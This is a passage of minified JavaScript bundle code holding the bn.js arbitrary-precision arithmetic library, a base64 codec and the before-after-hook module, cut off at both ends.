0!==f&&(this.words[A]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function M(z){for(var l=new Array(z.bitLength()),f=0;f<l.length;f++){var v=f%26;l[f]=(z.words[f/26|0]&1<<v)>>>v}return l}(l);if(0===f.length)return new I(1);for(var A=this,v=0;v<f.length&&0===f[v];v++,A=A.sqr());if(++v<f.length)for(var P=A.sqr();v<f.length;v++,P=P.sqr())0!==f[v]&&(A=A.mul(P));return A},I.prototype.iushln=function(l){$("number"==typeof l&&l>=0);var P,f=l%26,A=(l-f)/26,v=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P<this.length;P++){var X=this.words[P]&v;this.words[P]=(0|this.words[P])-X<<f|G,G=X>>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==A){for(P=this.length-1;P>=0;P--)this.words[P+A]=this.words[P];for(P=0;P<A;P++)this.words[P]=0;this.length+=A}return this.strip()},I.prototype.ishln=function(l){return $(0===this.negative),this.iushln(l)},I.prototype.iushrn=function(l,f,A){var v;$("number"==typeof l&&l>=0),v=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<<P,L=A;if(v-=G,v=Math.max(0,v),L){for(var h=0;h<G;h++)L.words[h]=this.words[h];L.length=G}if(0!==G)if(this.length>G)for(this.length-=G,h=0;h<this.length;h++)this.words[h]=this.words[h+G];else this.words[0]=0,this.length=1;var R=0;for(h=this.length-1;h>=0&&(0!==R||h>=v);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,A){return $(0===this.negative),this.iushrn(l,f,A)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return!(this.length<=A||!(this.words[A]&1<<f))},I.prototype.imaskn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return $(0===this.negative,"imaskn works only with positive numbers"),this.length<=A?this:(0!==f&&A++,this.length=Math.min(A,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<<f),this.strip())},I.prototype.maskn=function(l){return this.clone().imaskn(l)},I.prototype.iaddn=function(l){return $("number"==typeof l),$(l<67108864),l<0?this.isubn(-l):0!==this.negative?1===this.length&&(0|this.words[0])<l?(this.words[0]=l-(0|this.words[0]),this.negative=0,this):(this.negative=0,this.isubn(l),this.negative=1,this):this._iaddn(l)},I.prototype._iaddn=function(l){this.words[0]+=l;for(var f=0;f<this.length&&this.words[f]>=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if($("number"==typeof l),$(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f<this.length&&this.words[f]<0;f++)this.words[f]+=67108864,this.words[f+1]-=1;return this.strip()},I.prototype.addn=function(l){return this.clone().iaddn(l)},I.prototype.subn=function(l){return this.clone().isubn(l)},I.prototype.iabs=function(){return this.negative=0,this},I.prototype.abs=function(){return this.clone().iabs()},I.prototype._ishlnsubmul=function(l,f,A){var P;this._expand(l.length+A);var G,X=0;for(P=0;P<l.length;P++){G=(0|this.words[P+A])+X;var L=(0|l.words[P])*f;X=((G-=67108863&L)>>26)-(L/67108864|0),this.words[P+A]=67108863&G}for(;P<this.length-A;P++)X=(G=(0|this.words[P+A])+X)>>26,this.words[P+A]=67108863&G;if(0===X)return this.strip();for($(-1===X),X=0,P=0;P<this.length;P++)X=(G=-(0|this.words[P])+X)>>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var A,v=this.clone(),P=l,G=0|P.words[P.length-1];0!=(A=26-this._countBits(G))&&(P=P.ushln(A),v.iushln(A),G=0|P.words[P.length-1]);var h,L=v.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R<h.length;R++)h.words[R]=0}var J=v.clone()._ishlnsubmul(P,1,L);0===J.negative&&(v=J,h&&(h.words[L]=1));for(var Z=L-1;Z>=0;Z--){var ue=67108864*(0|v.words[P.length+Z])+(0|v.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),v._ishlnsubmul(P,ue,Z);0!==v.negative;)ue--,v.negative=0,v._ishlnsubmul(P,1,Z),v.isZero()||(v.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),v.strip(),"div"!==f&&0!==A&&v.iushrn(A),{div:h||null,mod:v}},I.prototype.divmod=function(l,f,A){return $(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(v=G.div.neg()),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.iadd(l)),{div:v,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(v=G.div.neg()),{div:v,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var v,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var A=0!==f.div.negative?f.mod.isub(l):f.mod,v=l.ushrn(1),P=l.andln(1),G=A.cmp(v);return G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){$(l<=67108863);for(var f=(1<<26)%l,A=0,v=this.length-1;v>=0;v--)A=(f*A+(0|this.words[v]))%l;return A},I.prototype.idivn=function(l){$(l<=67108863);for(var f=0,A=this.length-1;A>=0;A--){var v=(0|this.words[A])+67108864*f;this.words[A]=v/l|0,f=v%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){$(0===l.negative),$(!l.isZero());var f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&A.isEven();)f.iushrn(1),A.iushrn(1),++L;for(var h=A.clone(),R=f.clone();!f.isZero();){for(var J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(v.isOdd()||P.isOdd())&&(v.iadd(h),P.isub(R)),v.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(A.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(A.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(G),P.isub(X)):(A.isub(f),G.isub(v),X.isub(P))}return{a:G,b:X,gcd:A.iushln(L)}},I.prototype._invmp=function(l){$(0===l.negative),$(!l.isZero());var J,f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=A.clone();f.cmpn(1)>0&&A.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)v.isOdd()&&v.iadd(G),v.iushrn(1);for(var h=0,R=1;0==(A.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(A.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(P)):(A.isub(f),P.isub(v))}return(J=0===f.cmpn(1)?v:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),A=l.clone();f.negative=0,A.negative=0;for(var v=0;f.isEven()&&A.isEven();v++)f.iushrn(1),A.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;A.isEven();)A.iushrn(1);var P=f.cmp(A);if(P<0){var G=f;f=A,A=G}else if(0===P||0===A.cmpn(1))break;f.isub(A)}return A.iushln(v)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){$("number"==typeof l);var f=l%26,A=(l-f)/26,v=1<<f;if(this.length<=A)return this._expand(A+1),this.words[A]|=v,this;for(var P=v,G=A;0!==P&&G<this.length;G++){var X=0|this.words[G];P=(X+=P)>>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var A,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)A=1;else{f&&(l=-l),$(l<=67108863,"Number is too big");var v=0|this.words[0];A=v===l?0:v<l?-1:1}return 0!==this.negative?0|-A:A},I.prototype.cmp=function(l){if(0!==this.negative&&0===l.negative)return-1;if(0===this.negative&&0!==l.negative)return 1;var f=this.ucmp(l);return 0!==this.negative?0|-f:f},I.prototype.ucmp=function(l){if(this.length>l.length)return 1;if(this.length<l.length)return-1;for(var f=0,A=this.length-1;A>=0;A--){var v=0|this.words[A],P=0|l.words[A];if(v!==P){v<P?f=-1:v>P&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return $(!this.red,"Already a number in reduction context"),$(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return $(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return $(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return $(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return $(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return $(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return $(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return $(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return $(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return $(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return $(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return $(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return $(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return $(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function U(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){U.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){U.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){U.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){U.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else $(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}U.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},U.prototype.ireduce=function(l){var A,f=l;do{this.split(f,this.tmp),A=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(A>this.n);var v=A<this.n?-1:f.ucmp(this.p);return 0===v?(f.words[0]=0,f.length=1):v>0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},U.prototype.split=function(l,f){l.iushrn(this.n,0,f)},U.prototype.imulK=function(l){return l.imul(this.k)},ae(K,U),K.prototype.split=function(l,f){for(var A=4194303,v=Math.min(l.length,9),P=0;P<v;P++)f.words[P]=l.words[P];if(f.length=v,l.length<=9)return l.words[0]=0,void(l.length=1);var G=l.words[9];for(f.words[f.length++]=G&A,P=10;P<l.length;P++){var X=0|l.words[P];l.words[P-10]=(X&A)<<4|G>>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,A=0;A<l.length;A++){var v=0|l.words[A];l.words[A]=67108863&(f+=977*v),f=64*v+(f/67108864|0)}return 0===l.words[l.length-1]&&(l.length--,0===l.words[l.length-1]&&l.length--),l},ae(ee,U),ae(se,U),ae(ve,U),ve.prototype.imulK=function(l){for(var f=0,A=0;A<l.length;A++){var v=19*(0|l.words[A])+f,P=67108863&v;v>>>=26,l.words[A]=P,f=v}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){$(0===l.negative,"red works only with positives"),$(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){$(0==(l.negative|f.negative),"red works only with positives"),$(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var A=l.add(f);return A.cmp(this.m)>=0&&A.isub(this.m),A._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var A=l.iadd(f);return A.cmp(this.m)>=0&&A.isub(this.m),A},le.prototype.sub=function(l,f){this._verify2(l,f);var A=l.sub(f);return A.cmpn(0)<0&&A.iadd(this.m),A._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var A=l.isub(f);return A.cmpn(0)<0&&A.iadd(this.m),A},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if($(f%2==1),3===f){var A=this.m.add(new I(1)).iushrn(2);return this.pow(l,A)}for(var v=this.m.subn(1),P=0;!v.isZero()&&0===v.andln(1);)P++,v.iushrn(1);$(!v.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,v),J=this.pow(l,v.addn(1).iushrn(1)),Z=this.pow(l,v),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();$(Ae<ue);var Ue=this.pow(R,new I(1).iushln(ue-Ae-1));J=J.redMul(Ue),R=Ue.redSqr(),Z=Z.redMul(R),ue=Ae}return J},le.prototype.invm=function(l){var f=l._invmp(this.m);return 0!==f.negative?(f.negative=0,this.imod(f).redNeg()):this.imod(f)},le.prototype.pow=function(l,f){if(f.isZero())return new I(1).toRed(this);if(0===f.cmpn(1))return l.clone();var v=new Array(16);v[0]=new I(1).toRed(this),v[1]=l;for(var P=2;P<v.length;P++)v[P]=this.mul(v[P-1],l);var G=v[0],X=0,L=0,h=f.bitLength()%26;for(0===h&&(h=26),P=f.length-1;P>=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==v[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,v[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var A=l.imul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var A=l.mul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},9742:(Pe,we)=>{"use strict";we.byteLength=function F(M){var p=Q(M),w=p[1];return 3*(p[0]+w)/4-w},we.toByteArray=function g(M){var p,K,D=Q(M),w=D[0],x=D[1],S=new j(function E(M,p,D){return 3*(p+D)/4-D}(0,w,x)),O=0,U=x>0?w-4:w;for(K=0;K<U;K+=4)p=ie[M.charCodeAt(K)]<<18|ie[M.charCodeAt(K+1)]<<12|ie[M.charCodeAt(K+2)]<<6|ie[M.charCodeAt(K+3)],S[O++]=p>>16&255,S[O++]=p>>8&255,S[O++]=255&p;return 2===x&&(p=ie[M.charCodeAt(K)]<<2|ie[M.charCodeAt(K+1)]>>4,S[O++]=255&p),1===x&&(p=ie[M.charCodeAt(K)]<<10|ie[M.charCodeAt(K+1)]<<4|ie[M.charCodeAt(K+2)]>>2,S[O++]=p>>8&255,S[O++]=255&p),S},we.fromByteArray=function y(M){for(var p,D=M.length,w=D%3,x=[],S=16383,O=0,U=D-w;O<U;O+=S)x.push(_(M,O,O+S>U?U:O+S));return 1===w?x.push(de[(p=M[D-1])>>2]+de[p<<4&63]+"=="):2===w&&x.push(de[(p=(M[D-2]<<8)+M[D-1])>>10]+de[p>>4&63]+de[p<<2&63]+"="),x.join("")};for(var de=[],ie=[],j="undefined"!=typeof Uint8Array?Uint8Array:Array,$="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",ae=0,I=$.length;ae<I;++ae)de[ae]=$[ae],ie[$.charCodeAt(ae)]=ae;function Q(M){var p=M.length;if(p%4>0)throw new Error("Invalid string. Length must be a multiple of 4");var D=M.indexOf("=");return-1===D&&(D=p),[D,D===p?0:4-D%4]}function b(M){return de[M>>18&63]+de[M>>12&63]+de[M>>6&63]+de[63&M]}function _(M,p,D){for(var x=[],S=p;S<D;S+=3)x.push(b((M[S]<<16&16711680)+(M[S+1]<<8&65280)+(255&M[S+2])));return x.join("")}ie["-".charCodeAt(0)]=62,ie["_".charCodeAt(0)]=63},2685:(Pe,we,de)=>{var ie=de(5309),j=de(9597),$=de(7117),ae=Function.bind,I=ae.bind(ae);function Q(_,y,M){var p=I($,null).apply(null,M?[y,M]:[y]);_.api={remove:p},_.remove=p,["before","error","after","wrap"].forEach(function(D){var w=M?[y,D,M]:[y,D];_[D]=_.api[D]=I(j,null).apply(null,w)})}function E(){var _={registry:{}},y=ie.bind(null,_);return Q(y,_),y}var g=!1;function b(){return g||(console.warn('[before-after-hook]: "Hook()" repurposing warning, use "Hook.Collection()". Read more: https://git.io/upgrade-before-after-hook-to-1.4'),g=!0),E()}b.Singular=function F(){var y={registry:{}},M=ie.bind(null,y,"h");return Q(M,y,"h"),M}.bind(),b.Collection=E.bind(),Pe.exports=b,Pe.exports.Hook=b,Pe.exports.Singular=b.Singular,Pe.exports.Collection=b.Collection},9597:Pe=>{Pe.exports=function we(de,ie,j,$){var ae=$;de.registry[j]||(de.registry[j]=[]),"before"===ie&&($=function(I,Q){return Promise.resolve().then(ae.bind(null,Q)).then(I.bind(null,Q))}),"after"===ie&&($=function(I,Q){var F;return Promise.resolve().then(I.bind(null,Q)).then(function(E){return ae(F=E,Q)}).then(function(){return F})}),"error"===ie&&($=function(I,Q){return Promise.resolve().then(I.bind(null,Q)).catch(function(F){return ae(F,Q)})}),de.registry[j].push({hook:$,orig:ae})}},5309:Pe=>{Pe.exports=function we(de,ie,j,$){if("function"!=typeof j)throw new Error("method for before hook must be a function");return $||($={}),Array.isArray(ie)?ie.reverse().reduce(function(ae,I){return we.bind(null,de,I,ae,$)},j)():Promise.resolve().then(function(){return de.registry[ie]?de.registry[ie].reduce(function(ae,I){return I.hook.bind(null,ae,$)},j)():j($)})}},7117:Pe=>{Pe.exports=function we(de,ie,j){if(de.registry[ie]){var $=de.registry[ie].map(function(ae){return ae.orig}).indexOf(j);-1!==$&&de.registry[ie].splice($,1)}}},9423:function(Pe,we,de){!function(ie,j){"use strict";function $(A,v){if(!A)throw new Error(v||"Assertion failed")}function ae(A,v){A.super_=v;var P=function(){};P.prototype=v.prototype,A.prototype=new P,A.prototype.constructor=A}function I(A,v,P){if(I.isBN(A))return A;this.negative=0,this.words=null,this.length=0,this.red=null,null!==A&&(("le"===v||"be"===v)&&(P=v,v=10),this._init(A||0,v||10,P||"be"))}var Q;"object"==typeof ie?ie.exports=I:j.BN=I,I.BN=I,I.wordSize=26;try{Q="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:de(6601).Buffer}catch(A){}function F(A,v){var P=A.charCodeAt(v);return P>=48&&P<=57?P-48:P>=65&&P<=70?P-55:P>=97&&P<=102?P-87:void $(!1,"Invalid character in "+A)}function E(A,v,P){var G=F(A,P);return P-1>=v&&(G|=F(A,P-1)<<4),G}function g(A,v,P,G){for(var X=0,L=0,h=Math.min(A.length,P),R=v;R<h;R++){var J=A.charCodeAt(R)-48;X*=G,L=J>=49?J-49+10:J>=17?J-17+10:J,$(J>=0&&L<G,"Invalid character"),X+=L}return X}function b(A,v){A.words=v.words,A.length=v.length,A.negative=v.negative,A.red=v.red}if(I.isBN=function(v){return v instanceof I||null!==v&&"object"==typeof v&&v.constructor.wordSize===I.wordSize&&Array.isArray(v.words)},I.max=function(v,P){return v.cmp(P)>0?v:P},I.min=function(v,P){return v.cmp(P)<0?v:P},I.prototype._init=function(v,P,G){if("number"==typeof v)return this._initNumber(v,P,G);if("object"==typeof v)return this._initArray(v,P,G);"hex"===P&&(P=16),$(P===(0|P)&&P>=2&&P<=36);var X=0;"-"===(v=v.toString().replace(/\s+/g,""))[0]&&(X++,this.negative=1),X<v.length&&(16===P?this._parseHex(v,X,G):(this._parseBase(v,P,X),"le"===G&&this._initArray(this.toArray(),P,G)))},I.prototype._initNumber=function(v,P,G){v<0&&(this.negative=1,v=-v),v<67108864?(this.words=[67108863&v],this.length=1):v<4503599627370496?(this.words=[67108863&v,v/67108864&67108863],this.length=2):($(v<9007199254740992),this.words=[67108863&v,v/67108864&67108863,1],this.length=3),"le"===G&&this._initArray(this.toArray(),P,G)},I.prototype._initArray=function(v,P,G){if($("number"==typeof v.length),v.length<=0)return this.words=[0],this.length=1,this;this.length=Math.ceil(v.length/3),this.words=new Array(this.length);for(var X=0;X<this.length;X++)this.words[X]=0;var L,h,R=0;if("be"===G)for(X=v.length-1,L=0;X>=0;X-=3)this.words[L]|=(h=v[X]|v[X-1]<<8|v[X-2]<<16)<<R&67108863,this.words[L+1]=h>>>26-R&67108863,(R+=24)>=26&&(R-=26,L++);else if("le"===G)for(X=0,L=0;X<v.length;X+=3)this.words[L]|=(h=v[X]|v[X+1]<<8|v[X+2]<<16)<<R&67108863,this.words[L+1]=h>>>26-R&67108863,(R+=24)>=26&&(R-=26,L++);return this._strip()},I.prototype._parseHex=function(v,P,G){this.length=Math.ceil((v.length-P)/6),this.words=new Array(this.length);for(var X=0;X<this.length;X++)this.words[X]=0;var R,L=0,h=0;if("be"===G)for(X=v.length-1;X>=P;X-=2)R=E(v,P,X)<<L,this.words[h]|=67108863&R,L>=18?(L-=18,this.words[h+=1]|=R>>>26):L+=8;else for(X=(v.length-P)%2==0?P+1:P;X<v.length;X+=2)R=E(v,P,X)<<L,this.words[h]|=67108863&R,L>=18?(L-=18,this.words[h+=1]|=R>>>26):L+=8;this._strip()},I.prototype._parseBase=function(v,P,G){this.words=[0],this.length=1;for(var X=0,L=1;L<=67108863;L*=P)X++;X--,L=L/P|0;for(var h=v.length-G,R=h%X,J=Math.min(h,h-R)+G,Z=0,ue=G;ue<J;ue+=X)Z=g(v,ue,ue+X,P),this.imuln(L),this.words[0]+Z<67108864?this.words[0]+=Z:this._iaddn(Z);if(0!==R){var Ie=1;for(Z=g(v,ue,v.length,P),ue=0;ue<R;ue++)Ie*=P;this.imuln(Ie),this.words[0]+Z<67108864?this.words[0]+=Z:this._iaddn(Z)}this._strip()},I.prototype.copy=function(v){v.words=new Array(this.length);for(var P=0;P<this.length;P++)v.words[P]=this.words[P];v.length=this.length,v.negative=this.negative,v.red=this.red},I.prototype._move=function(v){b(v,this)},I.prototype.clone=function(){var v=new I(null);return this.copy(v),v},I.prototype._expand=function(v){for(;this.length<v;)this.words[this.length++]=0;return this},I.prototype._strip=function(){for(;this.length>1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},"undefined"!=typeof Symbol&&"function"==typeof Symbol.for)try{I.prototype[Symbol.for("nodejs.util.inspect.custom")]=_}catch(A){I.prototype.inspect=_}else I.prototype.inspect=_;function _(){return(this.red?"<BN-R: ":"<BN: ")+this.toString(16)+">"}var y=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],M=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],p=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function x(A,v,P){P.negative=v.negative^A.negative;var G=A.length+v.length|0;P.length=G,G=G-1|0;var X=0|A.words[0],L=0|v.words[0],h=X*L,J=h/67108864|0;P.words[0]=67108863&h;for(var Z=1;Z<G;Z++){for(var ue=J>>>26,Ie=67108863&J,Ae=Math.min(Z,v.length-1),Ue=Math.max(0,Z-A.length+1);Ue<=Ae;Ue++)ue+=(h=(X=0|A.words[Z-Ue|0])*(L=0|v.words[Ue])+Ie)/67108864|0,Ie=67108863&h;P.words[Z]=0|Ie,J=0|ue}return 0!==J?P.words[Z]=0|J:P.length--,P._strip()}I.prototype.toString=function(v,P){var G;if(P=0|P||1,16===(v=v||10)||"hex"===v){G="";for(var X=0,L=0,h=0;h<this.length;h++){var 